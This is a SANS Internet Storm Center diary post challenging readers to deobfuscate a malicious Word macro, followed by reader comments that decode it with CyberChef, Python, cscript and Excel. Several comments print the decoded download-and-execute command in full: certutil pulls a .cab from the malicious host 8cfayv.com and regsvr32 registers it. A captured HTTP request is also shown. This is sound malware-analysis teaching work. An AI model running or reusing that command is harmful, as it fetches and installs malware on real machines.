Small Challenge: A Simple Word Maldoc - SANS Internet Storm Center

Small Challenge: A Simple Word Maldoc
A reader submitted malicious Word document deed contract,07.20.doc (also uploaded the Malware Bazaar). There are a couple of interesting aspects to this document. The first, that I will point out here, is that the VBA code is quite simple. The code is quite short. And there is string obfuscation. In this diary, I'm not going to analyze this document. If you are interested, I'm challenging you to analyze it. I've copied the code you see above to pastebin, so that you can have a go at it without needing the actual malware sample. If you participate, please post a comment with your solution. I'm particularly interested in your analysis method, rather than the deobfuscated command. Have fun :-) Didier Stevens Senior handler Microsoft MVP blog.DidierStevens.com DidierStevensLabs.com	DidierStevens 638 Posts ISC Handler Aug 2nd 2020
Thread locked Subscribe	Aug 2nd 2020 1 year ago
Cyberchef: Split, From Decimal, Xor. Detection for the malicious DLL isn't all that great: https://www.virustotal.com/gui/file/645b371d1e8c507033bf20cbb987b7dba87901e1dc0785149167189005845e86/detection - EB	e.b. 17 Posts
Quote	Aug 3rd 2020 1 year ago
Using LibreOffice on Linux the VBA-Code run with small changes. '"cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"" But: I don't understand competly the cmd-command, and on my system Excel blocks all WScript.Run cmd since recently. So does this code launch on a up-to-date system?	Anonymous
Quote	Aug 3rd 2020 1 year ago
Since in the macro itself there is the decode function embedded, I first read that and understand the high level process, then I try to reproduce it using alternative safe tools. In this case, as also e.b. posted, I used CyberChef with the following recipe Split('%',',') From_Decimal('Comma',false) XOR({'option':'Decimal','string':'111'},'Standard',false) The output is cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp" Basically, the macro first copies the certutil.exe in C:\ProgramData, and then uses the decoded command for downloading a payload using certutil copy. It looks like to be a dll since it is registered in the system via the regsvr32 tool, but this MDN (malware delivery network) resource is not still active, so I'm unable to download that piece of software.	PaoloLuise 2 Posts
Quote	Aug 3rd 2020 1 year ago
GET /bolb/jaent.php?l=liut6.cab HTTP/1.1 Accept: / User-Agent: CertUtil URL Agent Host: 8cfayv.com Pragma: no-cache Connection: close ==================================================================================== URL: 8cfayv(.)com/bolb/jaent(.)php?l=liut6(.)cab Captured in Burp in Sandbox. However, domain is no more active so can't go further.	Anonymous
Quote	Aug 3rd 2020 1 year ago
Just followed the deobfuscation method of the VBA code with Python: encoded = "12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%10%23%10%79%64%74%26%74%49%12%49%14%49%12%49%7%49%10%49%79%64%9%49%79%7%27%27%31%85%64%64%87%12%9%14%22%25%65%12%0%2%64%13%0%3%13%64%5%14%10%1%27%65%31%7%31%80%3%82%3%6%26%27%89%65%12%14%13%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%79%73%73%79%12%14%3%3%79%29%10%8%28%25%29%92%93%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%77" characters = encoded.split("%") for i in range(len(characters)): characters[i] = chr(int(characters[i]) ^ 111) decoded = ''.join(characters) print(decoded) [OUT]: cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp" C:\ProgramData\1.exe seems a copy of certutil.exe, the code gets a CAB to install something and then register it with regsvc32?	RoundofThree 1 Posts
Quote	Aug 3rd 2020 1 year ago
To decode on Windows, modify the code to log the result (WScript.Echo LG), encapsulate the relevant function and call to it in a script (.vbs) file and run from a command prompt using the Windows script host (cscript.exe). No additional tools required.	antman 1 Posts
Quote	Aug 4th 2020 1 year ago
I didn't see this until today (15 Aug 2020, Sat) >> I'm particularly interested in your analysis method I'm not a malware analyst, nor do I play one on TV. However, I do some coding in VBA to automate my compliance work so that was a helpful skill. I used two tools (on my home computer): Excel 2007 (which doesn't have Xor, that was introduced in 2013) Notepad Step 1 I took the string being passed to the h() function [ignoring the double quotation marks] and pasted that into cell A1 in a fresh Excel worksheet Step 2 Select column A Data tab, Text to Columns Select "Delimited" "Other" checkbox, entered the percent sign into the associated input field This left me with numeric values in cells A1 thru FM1 Step 3 Discovered that the XOR worksheet function wasn't introduced until 2013 so I wrote my own user-defined function (UDF) in VBA code Public Function EXOR(arg_1 As Variant, arg_2 As Variant) As Variant EXOR = arg_1 Xor arg_2 End Function I couldn't name my UDF as "Xor" because that's a reserved keyword in VBA so I called it EXOR Step 4 In Cell A2: =EXOR(A$1,111) and then copied from B2 thru FM2 In Cell A3: =CHAR(A$2) and then copied from B3 thru FM3 Selected cells A3 thru FM3 and copied to clipboard Step 5 In a fresh Notepad document, pasted from clipboard Selected the whitespace between the first two letters (of 'c' and 'm') and copied to the clipboard Edit menu, Replace Pasted the whitespace stuff into the "Find what" field and left the "Replace with" field alone Replace All Viola! cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"	Anonymous
Quote	Aug 16th 2020 1 year ago

A reader submitted malicious Word document deed contract,07.20.doc (also uploaded the Malware Bazaar).

There are a couple of interesting aspects to this document. The first, that I will point out here, is that the VBA code is quite simple.

The code is quite short. And there is string obfuscation.

In this diary, I'm not going to analyze this document.

If you are interested, I'm challenging you to analyze it. I've copied the code you see above to pastebin, so that you can have a go at it without needing the actual malware sample.

If you participate, please post a comment with your solution. I'm particularly interested in your analysis method, rather than the deobfuscated command.

Have fun :-)

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

DidierStevens

638 Posts
ISC Handler

Aug 2nd 2020

Cyberchef: Split, From Decimal, Xor. Detection for the malicious DLL isn't all that great: https://www.virustotal.com/gui/file/645b371d1e8c507033bf20cbb987b7dba87901e1dc0785149167189005845e86/detection

- EB

e.b.

17 Posts

Using LibreOffice on Linux the VBA-Code run with small changes.

'"cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp""

But: I don't understand competly the cmd-command, and on my system Excel blocks all WScript.Run cmd since recently. So does this code launch on a up-to-date system?

Anonymous

Since in the macro itself there is the decode function embedded, I first read that and understand the high level process, then I try to reproduce it using alternative safe tools. In this case, as also e.b. posted, I used CyberChef with the following recipe

Split('%',',')
From_Decimal('Comma',false)
XOR({'option':'Decimal','string':'111'},'Standard',false)

The output is
cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"

Basically, the macro first copies the certutil.exe in C:\ProgramData, and then uses the decoded command for downloading a payload using certutil copy. It looks like to be a dll since it is registered in the system via the regsvr32 tool, but this MDN (malware delivery network) resource is not still active, so I'm unable to download that piece of software.

PaoloLuise

2 Posts

GET /bolb/jaent.php?l=liut6.cab HTTP/1.1
Accept: */*
User-Agent: CertUtil URL Agent
Host: 8cfayv.com
Pragma: no-cache
Connection: close
====================================================================================
URL: 8cfayv(.)com/bolb/jaent(.)php?l=liut6(.)cab
Captured in Burp in Sandbox. However, domain is no more active so can't go further.

Anonymous

Just followed the deobfuscation method of the VBA code with Python:

encoded = "12%2%11%79%64%12%79%77%28%10%27%79%26%82%26%29%3%73%73%12%14%3%3%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%10%23%10%79%64%74%26%74%49%12%49%14%49%12%49%7%49%10%49%79%64%9%49%79%7%27%27%31%85%64%64%87%12%9%14%22%25%65%12%0%2%64%13%0%3%13%64%5%14%10%1%27%65%31%7%31%80%3%82%3%6%26%27%89%65%12%14%13%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%79%73%73%79%12%14%3%3%79%29%10%8%28%25%29%92%93%79%44%85%51%63%29%0%8%29%14%2%43%14%27%14%51%94%65%27%2%31%77"

characters = encoded.split("%")

for i in range(len(characters)):
characters[i] = chr(int(characters[i]) ^ 111)

decoded = ''.join(characters)

print(decoded)

[OUT]: cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"

C:\ProgramData\1.exe seems a copy of certutil.exe, the code gets a CAB to install something and then register it with regsvc32?

RoundofThree

1 Posts

To decode on Windows, modify the code to log the result (WScript.Echo LG), encapsulate the relevant function and call to it in a script (.vbs) file and run from a command prompt using the Windows script host (cscript.exe). No additional tools required.

antman

1 Posts

I didn't see this until today (15 Aug 2020, Sat)

>> I'm particularly interested in your analysis method

I'm not a malware analyst, nor do I play one on TV.

However, I do some coding in VBA to automate my compliance work so that was a helpful skill.

I used two tools (on my home computer):
Excel 2007 (which doesn't have Xor, that was introduced in 2013)
Notepad

Step 1

I took the string being passed to the h() function [ignoring the double quotation marks] and pasted that into cell

A1 in a fresh Excel worksheet

Step 2

Select column A
Data tab, Text to Columns
Select "Delimited"
"Other" checkbox, entered the percent sign into the associated input field

This left me with numeric values in cells A1 thru FM1

Step 3

Discovered that the XOR worksheet function wasn't introduced until 2013 so I wrote my own user-defined function

(UDF) in VBA code

Public Function EXOR(arg_1 As Variant, arg_2 As Variant) As Variant
EXOR = arg_1 Xor arg_2
End Function

I couldn't name my UDF as "Xor" because that's a reserved keyword in VBA so I called it EXOR

Step 4

In Cell A2: =EXOR(A$1,111)
and then copied from B2 thru FM2

In Cell A3: =CHAR(A$2)
and then copied from B3 thru FM3

Selected cells A3 thru FM3 and copied to clipboard

Step 5

In a fresh Notepad document, pasted from clipboard

Selected the whitespace between the first two letters (of 'c' and 'm') and copied to the clipboard

Edit menu, Replace

Pasted the whitespace stuff into the "Find what" field and left the "Replace with" field alone

Replace All

Viola!

cmd /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"

Anonymous